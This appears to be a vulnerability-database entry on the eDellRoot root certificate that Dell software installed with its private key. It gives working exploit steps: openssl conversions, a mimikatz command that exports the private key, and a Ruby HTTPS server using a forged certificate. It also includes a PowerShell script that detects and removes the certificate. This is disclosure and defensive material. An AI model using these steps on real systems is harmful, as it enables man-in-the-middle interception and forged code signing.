Dell Foundation Services installs root certificate and private key (eDellRoot)
Attacker Value: Very High (2 users assessed)
Exploitability: Moderate (2 users assessed)
Description
Dell Foundation Services installs the eDellRoot certificate into the Trusted Root Certificate Store on Microsoft Windows systems. The certificate includes the private key. This allows attackers to create trusted certificates and perform impersonation, man-in-the-middle (MiTM), and passive decryption attacks, resulting in the exposure of sensitive information.
Technical Analysis
Details
How to exploit:
- Export the DER CA certificate (through the Windows certificate manager, for example).
- Convert the DER CA certificate to PEM:
openssl x509 -in der_edell_root.cer -inform der -outform pem -out edell_root.pem
- Export the certificate's private key using mimikatz:
crypto::certificates /systemstore:local_machine /store:Root /export
The certificate (again) and its private key will be in the directory where mimikatz lives. The private key is inside the .pfx.
- Extract the key from the pfx and save it as PEM (password: mimikatz):
openssl pkcs12 -in local_machine_Root_3_eDellRoot.pfx -nocerts -out key.pem -nodes
- Save a file.srl containing “6C”.
- Create a server certificate request:
openssl genrsa -out server.key 1024
openssl req -key server.key -new -out server.req
- Use the CA certificate and its private key to generate the server certificate:
openssl x509 -req -in server.req -CA edell_root.pem -CAkey key.pem -CAserial file.srl -out server.pem
- Profit!
require 'webrick'
require 'webrick/https'
require 'openssl'

# Load the server certificate issued under eDellRoot and its private key
cert = OpenSSL::X509::Certificate.new(File.read('server.pem'))
pkey = OpenSSL::PKey::RSA.new(File.read('server.key'))

# Start an HTTPS listener on port 8000 that presents that certificate
server = WEBrick::HTTPServer.new(:Port => 8000, :SSLEnable => true, :SSLCertificate => cert, :SSLPrivateKey => pkey)
trap('INT') { server.shutdown }
server.start
Go to localhost:8000/test.html; you should see that eDellRoot has identified the site as localhost, and that your connection is trusted.
Ratings
- Attacker Value: Very High
- Exploitability: Medium
Technical Analysis
It’s terrifying that this certificate supports all issuance and application policies. Reddit users have proven that this can be used to MitM HTTPS-encrypted web browsing, as well as to sign code. It’s unclear as to whether the certificate is unique to each install (which would turn this into maybe a local privesc), or whether the certificate is shared across all installs, at which point this becomes a threat to any Dell user on a compromised network.
It’s also worth pointing out that some users didn’t have the certificate described, but then had it added later after running updates. So sysadmins might have checked for this, but then had their workstations put into a vulnerable state afterwards.
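The point above, that the certificate can appear on a workstation after a later update, makes a repeatable check worth having. The following PowerShell is an added example written for this page (it is not from either assessor, AttackerKB, or Dell): it audits the machine and user Trusted Root stores for a certificate whose subject contains "eDellRoot", reports whether the private key is present locally, and shows the removal as a dry run. The subject match is the only identifier it assumes, since the page gives no thumbprint; run it from an elevated session.

```powershell
# Added example, not code from the page. Assumes only that the certificate's
# subject contains "eDellRoot", as the description states.

function Find-EDellRoot {
    param(
        [string[]]$Stores = @('Cert:\LocalMachine\Root', 'Cert:\CurrentUser\Root')
    )
    foreach ($store in $Stores) {
        Get-ChildItem -Path $store -ErrorAction SilentlyContinue |
            Where-Object { $_.Subject -like '*eDellRoot*' } |
            ForEach-Object {
                [pscustomobject]@{
                    Store         = $store
                    Subject       = $_.Subject
                    Thumbprint    = $_.Thumbprint
                    NotAfter      = $_.NotAfter
                    # $true means the CA signing key is on this machine, so any
                    # certificate chained to it will be trusted here
                    HasPrivateKey = $_.HasPrivateKey
                }
            }
    }
}

$findings = Find-EDellRoot
if (-not $findings) {
    Write-Output 'eDellRoot not present in the Root stores.'
} else {
    $findings | Format-Table -AutoSize
    # Remediation: remove the certificate and its private key from the store.
    # -WhatIf keeps this a dry run; drop it once the output has been reviewed.
    $findings | ForEach-Object {
        Remove-Item -Path (Join-Path $_.Store $_.Thumbprint) -DeleteKey -WhatIf
    }
}
```

Because the second assessment notes the certificate was re-added after updates, a one-off check is not enough: schedule this (or an equivalent query in your endpoint inventory tooling) to run after Dell Foundation Services updates, and treat HasPrivateKey being true as the high-severity condition, since a root certificate without its private key cannot be used to mint new trusted certificates.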